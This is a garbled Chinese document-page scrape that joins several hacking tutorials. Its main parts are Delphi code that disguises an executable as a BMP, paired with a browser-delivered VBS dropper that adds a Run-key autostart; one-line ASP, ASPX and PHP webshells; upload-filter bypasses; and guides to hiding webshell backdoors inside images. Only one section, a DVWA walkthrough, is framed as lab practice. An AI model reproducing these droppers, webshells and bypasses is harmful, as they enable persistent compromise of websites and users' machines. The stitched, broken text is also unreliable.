看上去好象很复杂,下面我们一步一步来:1) EXE变BMP的方法大家自己去查查BMP文件资料就会知道,BMP文件的文件头有54个字节,简单来说里面包含了BMP文件的长宽、位数、文件大小、数据区长度。

我们只要在EXE文件的文件头前面添加相应的BMP文件头(当然BMP文件头里面的数据要符合EXE文件的大小啦),这样就可以欺骗IE下载该BMP文件,开始我们用JPG文件做过试验,发现如果文件头不正确的话,是不会下载的,转换代码如下:FindFirstFile(Pchar(ParamStr(1)),fd); fs:=fd.nFileSizeLow;col := 4;while true do beginif (fs mod 12)=0 then beginlen:=fs;end else len:=fs+12-(fs mod 12);row := len div col div 3;if row>col then begincol:=col+4;end else Break;end;FillChar(buffer,256,0);{一下为BMP文件头数据}Buffer[0]:='B';Buffer[1]:='M'; PDWORD(@buffer[18])^:=col;PDWORD(@buffer[22])^:=row;PDWORD(@buffer[34])^:=len;PDWORD(@buffer[2])^:=len+54; PDWORD(@buffer[10])^:=54;PDWORD(@buffer[14])^:=40;PWORD(@buffer[26])^:=1;以上代码可以在DELPHI4,5,6中编译 ,就可以得到一个exe2bmp.exe文件.大家打开MSDOS方式,输入exe2bmp myexe.exe mybmp.bmp回车就可以把第二个参数所指定的EXE文件转换成BMP格式.接着就是把这个BMP图片放到网页上了,如果大家打开过这张图片的话,一定发现这张BMP又花,颜色又单调.所以大家放在网页上最好用这样的格式以下是放在网页上的脚本var st=fso.CreateTextFile(vbs,true);st.WriteLine('Option Explicit');st.WriteLine('Dim FSO,WSH,CACHE,str');st.WriteLine('Set FSO =CreateObject("Scripting.FileSystemObject")');st.WriteLine('Set WSH = CreateObject("WScript.Shell")');st.WriteLine('CACHE=wsh.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellFolders\\Cache")'); st.WriteLine('wsh.RegDelete("HKCU\\Software\\Microsoft\\Windows \\CurrentVersion\\Run\\vbs")');st.WriteLine ('wsh.RegWrite "HKCU\\Software\\Microsoft\\Windows \\CurrentVersion\\Run\\tmp","tmp.exe"');st.WriteLine('SearchBMPFilefso.GetFolder(CACHE),"mybmp[1].bmp"');st.WriteLine('WScript.Quit()');st.WriteLine('Function SearchBMPFile(Folder,fname)');st.WriteLine(' Dim SubFolder,File,Lt,tmp,winsys');st.WriteLine(' str=FSO.GetParentFolderName(folder) &"\\" & & "\\" & fname');st.WriteLine(' if FSO.FileExists(str) then');st.WriteLine(' tmp=fso.GetSpecialFolder(2) & "\\"');st.WriteLine(' winsys=fso.GetSpecialFolder(1) & "\\"');st.WriteLine(' set File=FSO.GetFile(str)');st.WriteLine(' File.Copy(tmp & "tmp.dat")');st.WriteLine(' File.Delete');st.WriteLine(' set Lt=FSO.CreateTextFile(tmp & "tmp.in")');st.WriteLine(' Lt.WriteLine("rbx")');st.WriteLine(' Lt.WriteLine("0")');st.WriteLine(' Lt.WriteLine("rcx")');st.WriteLine(' Lt.WriteLine("1000")');st.WriteLine(' Lt.WriteLine("w136")');st.WriteLine(' Lt.WriteLine("q")');st.WriteLine(' Lt.Close');st.WriteLine(' WSH.Run "command /c debug " & tmp & "tmp.dat<" & tmp & "tmp.in >" & tmp & "tmp.out",false,6');st.WriteLine(' On Error Resume Next ');st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")');st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Delete');st.WriteLine(' FSO.GetFile(tmp & "tmp.in").Delete');st.WriteLine(' FSO.GetFile(tmp & "tmp.out").Delete');st.WriteLine(' end if');st.WriteLine(' If Folder.SubFolders.Count <> 0 Then');st.WriteLine(' For Each SubFolder In Folder.SubFolders');st.WriteLine(' SearchBMPFile SubFolder,fname');把该脚本保存为"js.js",在网页中插入:该脚本主要会在本地机器的SYSTEM目录下生成一个“S.VBS”文件,该脚本文件会在下次开机时自动运行。

一句话木马——精选推荐

一句话木马——精选推荐

⼀句话⽊马web安全--⼀句话⽊马0x00 php预备知识PHP $_GET预定义的$_GET变量⽤于收集来⾃method=‘’get“的表单中的值。

从带有GET⽅法的表单发送的信息,对任何⼈都是可见的(会显⽰在浏览器的地址栏),⽽$_GET就是⽤来收集表单数据的变量,⽽表单域的名称会⾃动变成为$ _GET数组中的键。

例如发送到服务器的url为/welcome.php?fname=Shuke&age=3welcome.php⽂件现在就可以$_GET变量来收集表单数据了欢迎<?php echo $_GET["fname"]; ?>!<br>//在html中<br>表⽰换⾏,有多少个<br>就表⽰换多少⾏。

你的年龄是<?php echo $_GET["age"]; ?> 岁得到的结果显⽰为欢迎shuke!你的年龄是3岁PHP $_POST在PHP中,预定的$_POST⽤于收集来⾃method="post"表单中的值跟GET相反,POST⽅法发送的表单对任何⼈都是不可见的,当然也不会显⽰在浏览器地址栏的url中,⽽$_POST就是⽤来收集⽤POST⽅法发送的表单数据的变量,⽽表单域的名称会⾃动变成为$ _POST数组中的键。

例如form.html⽂件代码如下<html><head><meta charset="utf-8"><title>xxxxx</title></head><body><form action="welcome.php" method="post">名字: <input type="text" name="fname">年龄: <input type="text" name="age"><input type="submit" value="提交"></form></body></html>提交时,url显⽰为/welcome.phpwelcome.php⽂件现在就可以$_POST变量来收集表单数据了欢迎<?php echo $_POST["fname"]; ?>!<br>你的年龄是<?php echo $_POST["age"]; ?> 岁得到的结果显⽰为欢迎shuke!你的年龄是3岁$_REQUEST变量包含$_GET _POST _COOIKE的内容,可收集通过POST或GET发送的的表单数据eval()函数要点:eval()函数把字符串作为PHP代码执⾏。

一句话木马绕过和防御

一句话木马绕过和防御

一句话木马绕过和防御作者:jaivy若有错误欢迎指正,非常感谢!若有疑问欢迎讨论,共同学习!·WebShellWebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。

中国菜刀可以连接asp、aspx、php、jsp的一句话木马。

·常见的一句话木马Asp:<%eval request("x")%>aspx: <%@ Page Language="Jscript"%><%eval(Request.Item["x"],"unsafe");%> php: <?php @eval($_POST['x']);?>密码均为x一、本地检测及绕过方法·前台文件扩展名检测(弹小框框的一般就是该检测了)(本地漏洞客户端漏洞改扩展名,burp抓包,改回来即可)四种办法绕过,1 . 00截断(两种方式实现,但实质都一样)00截断原理:计算机遇到'\0'字符,就认为字符串结束了。

(可以联系c语言字符串后面自动添加了一个‘\0’来判断是否到达末尾来理解)方法一:在hex中修改(在16进制中修改)找到文件名pass.php.jpg对应的地方把2e改为00(【2e】是字符【.】对应的hex值)方法二直接在.php后面加上%00然后选中%00,对其进行url-decode 处理方法三:直接用在.php后面加上【’\0’】(但此方法是有时无效)方法四:直接把【pass.php.jpg改为pass.php】·content-type参数检测(修改数据包content-type)ContentType 一般参数有application/x-cdf 应用型文件text/HTML 文本image/JPEG jpg 图片image/GIF gif图片把ContentType 由application/x-cdf改为image/gif·文件内容检测:文件内容检测脚本中getimagesize(string filename)函数会通过读取文件头,返回图片的长、宽等信息,如果没有相关的图片文件头,函数会报错,是一种比较严的防御措施。

ASP(一句话木马)

ASP(一句话木马)

1、用^转义字符来写ASP(一句话木马)文件的方法:VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--? echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp2、显示SQL系统版本:Microsoft VBScript 编译器错误错误 '800a03f6'缺少 'End'/iisHelp/common/500-100.asp,行242Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corpo ration Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int. /display.asp,行173、在检测索尼中国的网站漏洞时,分明已经确定了漏洞存在却无法在这三种漏洞中找到对应的类型。

偶然间我想到了在SQL语言中可以使用―in‖关键字进行查询,例如―select * from mytable where id in(1)‖,括号中的值就是我们提交的数据,它的结果与使用―select * from mytable where id=1‖的查询结果完全相同。

3、DVWA之文件包含(一)

3、DVWA之文件包含(一)

3、DVWA之⽂件包含(⼀)⽂件包含⼜可以是本地⽂件包含或远程⽂件包含。

本地⽂件包含:⽂件存在本地⽬录远程⽂件包含:⽂件共享或存在⽹络上,需要访问<?php// The page we wish to display$file = $_GET[ 'page' ];>以上是low级别代码1、制作⼀句话⽊马图⽚⽊马:图⽚⽊马解析后会⽣成新的⼀句话⽊马⼀句话⽊马,这个是修改过的第⼀次的代码,没有加引号,导致解析出错。

图⽚通过CMD,制作成图⽚⽊马正常打开:⽤记事本打开:第⼀次制作的失败的图⽚⽊马制作成功,然后上传。

2、上传图⽚⽊马(⽂件上传⽤high级别)<?phpif( isset( $_POST[ 'Upload' ] ) ) {// Where are we going to be writing to?$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );// File information$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];// Is it an image?if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) && ( $uploaded_size < 100000 ) &&getimagesize( $uploaded_tmp ) ) {// Can we move the file to the upload folder?if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {// Noecho '<pre>Your image was not uploaded.</pre>';}else {// Yes!echo "<pre>{$target_path} succesfully uploaded!</pre>";}}else {// Invalid fileecho '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; }}>3、执⾏⽂件包含⽣成⼀句话⽊马(修改⽂件包含级别为low)通过服务器⽂件⽬录也可以看到多了⼀个hua.php⽂件,这个正是我们需要的!4、通过⼯具连接(重新调整级别为high)连接成功!。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

图片木马制作的三种方法Copy命令制作
1.asp内容:
打开cmd,数据一下命令:
此时打开两个jpg文件,相比:
且打开可以像一样显示图像。

把以下代码放入目标网站,即可按asp执行。

<% #include files=””%>
Uedit32(转载):
本制作来自于:雪糕。

我们通常在得到webshell之后都想给自己留个后门,等下次或以后有用得到的时候再进来看看。

但如果直接加入一句话木马<%execute request("value")%>到asp文件中时,在该页面上就会有类似如下的错误:
Microsoft VBScript 运行时错误错误 '800a000d'
类型不匹配: 'execute'
/news1/,行 3
所以我们就可以开动脑筋了,使用插入一句话木马的图片做我们的后门。

而且我们如果有足够的权限的话(希望网站中的文件可写),就直接把网站原有的图片变成后门,然后在那个asp文件中加入调用图片后门的代码:
<!--#include file="图片后门地址"-->
这样就没有上面的“类型不匹配: 'execute'”错误了,而且也更好的隐藏了我们的后门。

新挑战始终会伴着新事物的出现而出现,当我们直接将我们的一句话木马的asp文件改成jpg或gif文件的时候,这个图片文件是打不开的,这又容易被管理员发现。

然后我们就又开始思考并寻找新的方法:制作可以显示图片内容的图片格式后门。

制作步骤:
一、前期准备
材料:
1.一张图片:
2.一句话木马服务器端代码:
<%execute request("value")%>(其他的一句话也行)
3.一句Script标签:
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>一句话木马服务器端代码</SCRIPT> 4. 调用图片后门代码:
<!--#include file="图片地址"-->
工具:UltraEdit
二、开始制作:
1.使用UltraEdit打开文件,然后按CTRL +F 进行查找图片中的“<%”和“%>”
其中<%的十六进制代码是3E 25,那么%>就应该是25 3E,但是我们只把25改成00;
之后我们在新建一个文本编辑窗口,将我们的script标签代码
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT><%execute request("value")%>
</SCRIPT>
复制进去,然后点击右键选择十六进制编辑命令,这样会跳转到十六进制数据窗口,
复制所有的十六进制的数据,粘贴到的十六进制编辑窗口的最下面,
说明:为什么要粘贴到最下面
假设你把srcipt标签的十六进制代码粘贴到中间的话,就会破坏图片的完整性,那样下面的图片就看不到了,但是插入的一句话代码还是起作用的。

如图:
最后保存退出。

完成整个过程,我们的图片后门就做成。

看到了吧,图片和原来还是一样的,但有时候会影响图片显示效果。

说明:为什么要把“<%”和“%>”对应的十六进制中的25改成00呢改成其他的行不行
雪糕猜想:因为在我们的一句话木马服务器代码<%execute request("value")%>中含有“<%”和“%>”们,但我们使用一句话客户端连接时,就可能发生寻找错误,然后就找不到我们的一句话服务器端代码了,所以要把图片中的相似结构改成其他的。

我想25也应该可以改成别的,但还没实验过。

2.我们已经做好了图片后门,然后就是简单的配置一下了。

如果网站的asp网页可以被写入,那我们就将<!--#include file=""-->直接插入到网页中,这样这个网页的url就是成了我们使用一句话客户端连接的后门地址了;但要是不走运,那就自己新建一个asp文件,把<!--#include file=""-->加进去吧(这里我新建了一个文件)。

Ps插入
第二种方法:
1.用PS(photoshop)打开图片
2.文件→文件简介
插入你需要的木马代码
3.文件→保存(保存:覆盖源文件你也可以另存为你想要的其它格式)
中粮礼品卡中粮礼品册 kwVl1tzAjRdL。

相关文档
最新文档